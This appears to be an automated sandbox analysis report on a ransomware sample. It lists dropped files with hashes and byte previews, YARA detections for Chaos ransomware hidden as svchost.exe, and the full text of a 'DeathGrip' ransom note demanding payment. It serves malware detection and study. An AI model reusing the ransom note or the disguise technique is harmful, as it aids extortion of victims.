                                                          Preview:Metadata-Version: 2.1.Name: importlib-metadata.Version: 7.0.1.Summary: Read metadata from Python packages.Home-page: https://github.com/python/importlib_metadata.Author: Jason R. Coombs.Author-email: jaraco@jaraco.com.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: sphinx <7.2.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'docs'.Provides-Extra: perf
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):2107
                                                          Entropy (8bit):5.638532930027372
                                                          Encrypted:false
                                                          SSDEEP:48:GnuXtaGGJl/gYbaXM4cXzeom9pvJq/fwJOfYCqO1B4N/3WJV:JX8gYbcqzeRDJsoIYHO1B49qV
                                                          MD5:0F41B810A7A281A29BB6E7A4D3773345
                                                          SHA1:17D035B73CA5216712A1EE5FF890D56F41CC1D87
                                                          SHA-256:509A6C00664FC1DAE981364479F5409497C97698026953F35F2F6DD5ABD170A9
                                                          SHA-512:F74980593ED97EC14AE110E5EA5B8B2ED9E3C6E7A2FABF78698A317BAA407C0688F1F0BCA1A567915EDEF70E8A165E8284EC21F0846F69991DD30E7542C70A0C
                                                          Malicious:false
                                                          Preview:importlib_metadata-7.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-7.0.1.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-7.0.1.dist-info/METADATA,sha256=YvsDzB194dUN5E1AWwcIMCsS9MzX_SFtmuiGPcp2emc,4926..importlib_metadata-7.0.1.dist-info/RECORD,,..importlib_metadata-7.0.1.dist-info/WHEEL,sha256=oiQVh_5PnQM0E3gPdiz09WCNmwiHDMaGer_elqB3coM,92..importlib_metadata-7.0.1.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=CrDhGQz3SCK5Cct82OvmGzqzOqneJn3jLvvfmSx8nCs,31551..importlib_metadata/__pycache__/__init__.cpython-311.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-311.pyc,,..importlib_metadata/__pycache__/_collections.cpython-311.pyc,,..importlib_metadata/__pycache__/_compat.cpython-311.pyc,,..importlib_metadata/__pycache__/_functools.cpython-311.pyc,,..importlib_metadata/__pycache__/_itertools.cpython-311.pyc,,..imp
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):92
                                                          Entropy (8bit):4.8343614255301075
                                                          Encrypted:false
                                                          SSDEEP:3:RtEeX7MWcSlVlbY3KgP+tPCCfA5S:RtBMwlVCxWBBf
                                                          MD5:A227BF38FB17005B3BDB56CCC428B1BB
                                                          SHA1:502F95DA3089549E19C451737AA262E45C5BC3BC
                                                          SHA-256:A2241587FE4F9D033413780F762CF4F5608D9B08870CC6867ABFDE96A0777283
                                                          SHA-512:A0BA37A0B2F3D4AE1EE2B09BB13ED20912DB4E6A009FE9BA9414830AD4FDBF58571E195ABBE0D19F5582E2CF958CFB49FFDACD7C5182008699F92A0F5EEC6C41
                                                          Malicious:false
                                                          Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):5157656
                                                          Entropy (8bit):5.95816549046812
                                                          Encrypted:false
                                                          SSDEEP:98304:OH+jTaoFABs2NPAE7uLcdKmj8waP31CPwDvt3uFlDC:kQ+Bs2NQcdKmj8waP1CPwDvt3uFlDC
                                                          MD5:7A6A8C2A8C379B111CDCEB66B18D687D
                                                          SHA1:F3B8A4C731FA0145F224112F91F046FDDF642794
                                                          SHA-256:8E13B53EE25825B97F191D77B51ED03966F8B435773FA3FBC36F3EB668FC569B
                                                          SHA-512:F2EF1702DF861EF55EF397AD69985D62B675D348CAB3862F6CA761F1CE3EE896F663A77D7B69B286BE64E7C69BE1215B03945781450B186FC02CFB1E4CB226B5
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):39696
                                                          Entropy (8bit):6.641880464695502
                                                          Encrypted:false
                                                          SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                          MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                          SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                          SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                          SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):789784
                                                          Entropy (8bit):5.607345956416271
                                                          Encrypted:false
                                                          SSDEEP:6144:9jurAr6yUDGpdXh3Mr3r0oARnjmeUl4XOnZiRtw036WgfCBL5JyJ/OiFe9XbI:9MT6h3M7VxKXOrqdeOiFe9Xb
                                                          MD5:64ACB046FE68D64EE475E19F67253A3C
                                                          SHA1:D9E66C9437CE6F775189D6FDBD171635193EC4CC
                                                          SHA-256:B21309ABD3DBBB1BF8FB6AA3C250FC85D7B0D9984BF4C942D1D4421502F31A10
                                                          SHA-512:F8B583981DF528CF4F1854B94EFF6F51DD9D4BE91E6FA6329A8C4435B705457C868AE40EE030FA54BEBB646A37B547BC182C9CBF0DF9A07FEA03A18CF85C6766
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):199448
                                                          Entropy (8bit):6.374698779434704
                                                          Encrypted:false
                                                          SSDEEP:3072:ZKABBH4pwa0bGheNSeFPyP7pgE7xhAq36exBce56iXfVhyAJ1Ohc2gZtIsLh5Aj:ZBBHCqGheNSe9YeE7/AqV1XfPym2yk
                                                          MD5:CDCF0E74A32AD7DFEDA859A0CE4FCB20
                                                          SHA1:C72B42A59BA5D83E8D481C6F05B917871B415F25
                                                          SHA-256:91FE5B1B2DE2847946E5B3F060678971D8127DFD7D2D37603FDCD31BD5C71197
                                                          SHA-512:C26FDF57299B2C6085F1166B49BD9608D2DD8BC804034EBB03FB2BBA6337206B6018BF7F74C069493FFAE42F2E9D6337F6F7DF5306B80B63C8C3A386BCE69EA6
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):67352
                                                          Entropy (8bit):6.145559867069682
                                                          Encrypted:false
                                                          SSDEEP:768:ow/EsYpkVgBaz57kcDA7QKFmpz7cnzH/ks/KF61xubwmB1Cf//yhC74JFmpktJS7:P/5k8cnzeJptIsL0t7Sym1xm
                                                          MD5:0E105F62FDD1FF4157560FE38512220B
                                                          SHA1:99BD69A94B3DC99FE2C0F7BBBCD05AA0BC8CD45C
                                                          SHA-256:803BA8242B409080DF166320C05A4402AAB6DD30E31C4389871F4B68CA1AD423
                                                          SHA-512:59C0F749ED9C59EFDBCD04265B4985B1175FDD825E5A307745531ED2537397E739BC9290FDC3936CFD04F566E28BB76B878F124248B8344CF74F641C6B1101DE
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):5765912
                                                          Entropy (8bit):6.089565479797802
                                                          Encrypted:false
                                                          SSDEEP:98304:BBduVia4N3NWLvJP8IjF/d/aHMMwuPQyFF+RdioiZPbwappjDq:BBduVv4N3ILvJ8M/4wZy3+RdioiZPbwl
                                                          MD5:58E01ABC9C9B5C885635180ED104FE95
                                                          SHA1:1C2F7216B125539D63BD111A7ABA615C69DEB8BA
                                                          SHA-256:DE1B95D2E951FC048C84684BC7DF4346138910544EE335B61FC8E65F360C3837
                                                          SHA-512:CD32C77191309D99AEED47699501B357B35669123F0DD70ED97C3791A009D1855AB27162DB24A4BD9E719B68EE3B0539EE6DB88E71ABB9A2D4D629F87BC2C081
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):134656
                                                          Entropy (8bit):5.995319660651805
                                                          Encrypted:false
                                                          SSDEEP:3072:luJ2G0a2fYrFceQaVK756Y/r06trRjEKQze7KN9eJKVKG6j1J:luJ2faiYrFceQaVfY/rx1eze7KbewVrk
                                                          MD5:90B786DC6795D8AD0870E290349B5B52
                                                          SHA1:592C54E67CF5D2D884339E7A8D7A21E003E6482F
                                                          SHA-256:89F2A5C6BE1E70B3D895318FDD618506B8C0E9A63B6A1A4055DFF4ABDC89F18A
                                                          SHA-512:C6E1DBF25D260C723A26C88EC027D40D47F5E28FC9EB2DBC72A88813A1D05C7F75616B31836B68B87DF45C65EEF6F3EAED2A9F9767F9E2F12C45F672C2116E72
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):30488
                                                          Entropy (8bit):6.586478365575897
                                                          Encrypted:false
                                                          SSDEEP:384:dEeecReJKuHq1W57AvB0EZtIsQGQHQIYiSy1pCQvC5HAM+o/8E9VF0Ny5X3:XeUeJPHqoGDtIsQGq5YiSyvmAMxkE/3
                                                          MD5:653BDCCB7AF2AA9CCF50CB050FD3BE64
                                                          SHA1:AFE0A85425AE911694C250AB4CB1F6C3D3F2CC69
                                                          SHA-256:E24A3E7885DF9A18C29BA058C49C3ADCF59E4B58107847B98ECA365B6D94F279
                                                          SHA-512:07E841FDA7A2295380BFA05DB7A4699F18C6E639DA91D8EE2D126D4F96E4CDDAEDBD490DEB4D2A2E8E5877EDFFF877693F67A9DC487E29742943E062D7BE6277
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1504536
                                                          Entropy (8bit):6.579196400879108
                                                          Encrypted:false
                                                          SSDEEP:24576:P5EGpXUzJLtMyDHeWWAENOp8TaqQqP/mPhp44gyBGAidNlY30VM:PvqFLtMIHeWWA+U8TaYQhpzgycAPn
                                                          MD5:B49B8FDE59EE4E8178C4D02404D06EE7
                                                          SHA1:1816FC83155D01351E191D583C68E722928CCE40
                                                          SHA-256:1AFD7F650596AD97FCF358B0E077121111641C38CA9D53132BAB4C9588CF262F
                                                          SHA-512:A033CE87C2E503B386FB92AA79A7EC14D6C96E4A35D0CB76D4989BACD16F44C4ED5AC4E13057F05F9D199A3FD8545B9A25296515EC456F29C464D949FF34942A
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.C...C...C...J.O.......A.......N.......K.......G.......@...C......Y...B...Y...B...Y...B...Y...B...RichC...........................PE..d....l.d.........." ...$.............................................................D....`.........................................px...".............................../...........*..T............................(..@...............8............................text............................... ..`.rdata..............................@..@.data...PG.......>..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1018792
                                                          Entropy (8bit):6.641182647518247
                                                          Encrypted:false
                                                          SSDEEP:24576:hLyubutYBWSlhrANUDk8ExrmxvSZX0ypFiR+c:VyubJvlhrVETiR+c
                                                          MD5:8E7680A8D07C3C4159241D31CAAF369C
                                                          SHA1:62FE2D4AE788EE3D19E041D81696555A6262F575
                                                          SHA-256:36CC22D92A60E57DEE394F56A9D1ED1655EE9DB89D2244A959005116A4184D80
                                                          SHA-512:9509F5B07588A08A490F4C3CB859BBFE670052C1C83F92B9C3356AFA664CB500364E09F9DAFAC7D387332CC52D9BB7BB84CEB1493F72D4D17EF08B9EE3CB4174
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.Pc*.>0*.>0*.>0#..0..>0*.?0..>0O..0+.>0O.>1+.>0O.=1..>0O.;1p.>0O.01..>0O.:1d.>0O..0+.>0O.<1+.>0Rich*.>0........................PE..d....A.0.........." .........b.......6..............................................y.....`A........................................ ...........................H....d...'......p....y..T............................B...............o...............................text............................... ..`.rdata...w...0...x..................@..@.data....$..........................@....pdata..H...........................@..@.rsrc................R..............@..@.reloc..p............X..............@..B................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1141016
                                                          Entropy (8bit):5.435066249596469
                                                          Encrypted:false
                                                          SSDEEP:12288:P3EYbfjwR6nbsonRiPDjRrO5184EPYPx++ZiLKGZ5KXyVH4eD1JD:PUYbMB0IDJcjEwPgPOG6Xyd461JD
                                                          MD5:1905B5D0F945499441E8CD58EB123D86
                                                          SHA1:117E584E6FCC0E8CFC8E24E3AF527999F14BAC30
                                                          SHA-256:B1788B81FA160E5120451F9252C7745CDDE98B8CE59BF273A3DD867BB034C532
                                                          SHA-512:ED88CD7E3259239A0C8D42D95FA2447FC454A944C849FA97449AD88871236FEFDAFE21DBFA6E9B5D8A54DDF1D5281EC34D314CB93D47CE7B13912A69D284F522
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D|............eG.....c.....c.....c.....c.....b....Ke.......Q...b.....b.....b+.....b....Rich...........................PE..d....k.d.........." ...$.@..........P*..............................................J.....`.............................................X............`.......P..0....:.../...p.......]..T............................[..@............P..x............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data...H....0......................@....pdata..0....P.......&..............@..@.rsrc........`......................@..@.reloc.......p.......8..............@..B................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):4
                                                          Entropy (8bit):1.5
                                                          Encrypted:false
                                                          SSDEEP:3:Mn:M
                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                          Malicious:false
                                                          Preview:pip.
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:Unicode text, UTF-8 text
                                                          Category:dropped
                                                          Size (bytes):2203
                                                          Entropy (8bit):5.084146850941847
                                                          Encrypted:false
                                                          SSDEEP:48:DEYpFX5MPktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEYp/MPktjayq/7kOfsUzmbYy
                                                          MD5:D9BE712506F59B77F1B439378F1F17C9
                                                          SHA1:22B5EEDF6DA5662DB4453E1E3C0A208EAE78E005
                                                          SHA-256:40C658BCF17CF05DA506767D71FEFEBA0AA69060D437C8F7154BCD1E290B85C9
                                                          SHA-512:5952359E64F955C75A6881E7D7C24D25CF79BB0DE206E10964D71BE41692ACB905AA0D6F8E667C8680BDD262292313644AAC1E3B1E4848403A3344B546DD673E
                                                          Malicious:false
                                                          Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.42.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.7.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):4568
                                                          Entropy (8bit):5.71028247322035
                                                          Encrypted:false
                                                          SSDEEP:96:skXgPDwd1Px0CTQIvw7bjIH/Hu4vp88FmGvuXiJP9GJPh/TZ765qjKGAFI78oVew:skXgm2Moe2Y9Uh/TZ765qjKGAFeDVOLc
                                                          MD5:10548C03B6BCD243DA56AF48A5A96F22
                                                          SHA1:813EAE9354F294A34D85FA44A4E9B8D2619C1C2C
                                                          SHA-256:FD9796C4FF5266DB0E09688E332D1A9264452C8D1D97E0B2BE12EDE1B6ACD9A3
                                                          SHA-512:ABE92948C4F6DF5776B46094035F8527F3D565DC9E99BE102A10E36F0889A4CDFD31377932C2E138A54698E733078388CF308962A53BC2075D8B7CFF684E0D77
                                                          Malicious:false
                                                          Preview:../../Scripts/wheel.exe,sha256=N_djrUS8N_t8i0-4GjJsr5WnhfhurvICz9bS1M4yC_E,108413..wheel-0.42.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.42.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.42.0.dist-info/METADATA,sha256=QMZYvPF88F2lBnZ9cf7-ugqmkGDUN8j3FUvNHikLhck,2203..wheel-0.42.0.dist-info/RECORD,,..wheel-0.42.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.42.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.42.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=c5n4mea4NyUhMCk8GWbX4_O739E5ATPX23lTJRXf9ZI,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-311.pyc,,..wheel/__pycache__/__main__.cpython-311.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-311.pyc,,..wheel/__pycache__/bdist_wheel.cpython-311.pyc,,..whee
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):81
                                                          Entropy (8bit):4.672346887071811
                                                          Encrypted:false
                                                          SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                          MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                          SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                          SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                          SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                          Malicious:false
                                                          Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):133632
                                                          Entropy (8bit):5.851354810898845
                                                          Encrypted:false
                                                          SSDEEP:3072:HPwB2zC1vwC3XetCf5RlRVFhLaNKPAyymhNYm9b9e:HIB2zkvwGXetCfDlRVlPAyLYm9
                                                          MD5:1D6762B494DC9E60CA95F7238AE1FB14
                                                          SHA1:AA0397D96A0ED41B2F03352049DAFE040D59AD5D
                                                          SHA-256:FAE5323E2119A8F678055F4244177B5806C7B6B171B1945168F685631B913664
                                                          SHA-512:0B561F651161A34C37FF8D115F154C52202F573D049681F8CDD7BBA2E966BB8203780C19BA824B4A693EF12EF1EEEF6AEEEF96EB369E4B6129F1DEB6B26AAA00
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I^.f'..f'..f'......f'...&..f'...#..f'...$..f'.o.&..f'..."..f'...&..f'..f&..g'.o....f'.o.'..f'.o.%..f'.Rich.f'.................PE..d......d.........." .........................................................P............`..........................................................0..\....................@..$....v..T............................<..8............0..........@....................text...$........................... ..`.rdata......0......................@..@.data...x(......."..................@....pdata..............................@..@.rsrc...\....0......................@..@.reloc..$....@......................@..B................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\Desktop\main.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1357824
                                                          Entropy (8bit):4.029275266102345
                                                          Encrypted:false
                                                          SSDEEP:12288:75gafkW6xqP9iz8ZW29ohk3qHS/6gOHeA/MBU/7x5qDyNjC9Ha1DKs5y6blZRjHe:7Db/s/MSldTzfY/YRSv225PUXW8iF
                                                          MD5:840EB9E50C131322605C5EA90AE1312F
                                                          SHA1:FC9548F91123E05196DAD6BCAB11D29ABD01500C
                                                          SHA-256:F9600B1B06588E3815A55EB81E35289F7B9A5749AE623550734C5F3D8C04E038
                                                          SHA-512:8E37C5890089BF1997E1C4C777A92F71EAE9A86F11D1FB3CB3671DFA8C15C4365ED1F8811E6AAE4D31F0FE73C1960B142F684A5274F086491F7D238A79313FFE
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_Chaos_1, Description: Yara detected Chaos Ransomware, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                          • Rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM, Description: Detects executables containing many references to VEEAM. Observed in ransomware, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: unknown
                                                          • Rule: MALWARE_Win_Chaos, Description: Detects Chaos ransomware, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......\@..p............................................................(....*..0..........(....,.r...p(....&*(....,'~ ...-....#...s..... ...~ ...s....(....(....,.*(....,..(....~....,.(....~....,.~....(....+.~....,.~....(....~....,.(....~....,<~....,.(....~....,.(....~....,.(....~....,.(....~....,.( ...(....~....,.~....(....(....~....(!...*.s)...(....*..0.._..................r%..p....r;..p..........+.......(....o....o.......(....,.......&.....X.......i2..*.*.......+..J......
                                                          Process:C:\Users\user\Desktop\4wx72yFLka.exe
                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):17965330
                                                          Entropy (8bit):7.9968743048008255
                                                          Encrypted:true
                                                          SSDEEP:393216:jEkvT6o50QjTGtDTNk3meCcGfd9YMvrr5LTuguUiLXD:jD6buG5xaY5F9Yi19Ji3
                                                          MD5:14F564392EEC0B9EDA9530411159057C
                                                          SHA1:AB49B66DFF54E32DF235B11B8D84934C2B455523
                                                          SHA-256:50C043F374E51B8220FC411E24CC2C40C1AA59E1F19EBDC1170883C74C7DDF83
                                                          SHA-512:7D27CA263069F92B4B8BD38545EEE7FB260338AB246DFF94A606BA301F1FB7588A649926B1082B290D2D642CD8E94FC3491AC2ABFF6AAFC5173A9A025DACA65B
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?.........................PE..d....b.f.........."....%.....^.................@.............................p.......x....`.....................................................x....`....... ..."...........`..\...0..................................@............... ............................text............................... ..`.rdata...+.......,..................@..@.data...83..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc........`......................@..@.reloc..\....`......................@..B................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
